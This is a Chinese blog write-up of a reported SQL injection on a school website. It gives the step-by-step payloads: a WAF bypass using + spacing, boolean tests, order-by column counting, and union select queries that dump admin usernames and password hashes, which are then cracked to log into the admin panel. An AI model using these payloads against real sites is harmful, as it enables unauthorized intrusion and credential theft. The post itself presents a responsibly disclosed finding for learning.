记一次挖edusrc漏洞挖掘(sql注入)

在利用fofa收集信息的时候发现的,我这里直接开始挖洞部分写了。

前言:

目标是一个中学的站点,在一次挖洞过程中遇到个sql注入,漏洞已报送平台进行了修复。该文章仅用于交流学习,切勿利用相关信息非法测试,我也是刚入门的小白,欢迎各位大佬指点。

访问url/gywm.asp?id=95%20and%201=1被拦截了(Wts-waf我这里利用了此文章

https://www.freebuf.com/articles/268726.html

url/gywm.asp?id=95 +and+1=1的时候返回正常

url/gywm.asp?id=95 +and+1=2时候返回空白页面

已确定存在sql注入漏洞;

开始使用order by获得表的列数

访问url/gywm.asp?id=95+order+by+19--+的时候页面正常的;

访问: url/gywm.asp?id=95+order+by+20--+的时候页面显示500

判断出列数为19,此时我们可以通过union联合查询进行注入。

Payload:
url/gywm.asp?id=95+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+admin

此时我们可知admin的位置所以我把猜出来的表和列名放在了3和10的位置, 这下就已拿到了这两列名中的值。


Payload: 
url/gywm.asp?id=95+union+select+1,2,username,4,5,6,7,8,9,userpass,11,12,13,14,15,16,17,18,19+from+admin

账户密码都爆出来了然后去把md5密码解密后直接进去后台渗透也到此结束

  • 4
    点赞
  • 22
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值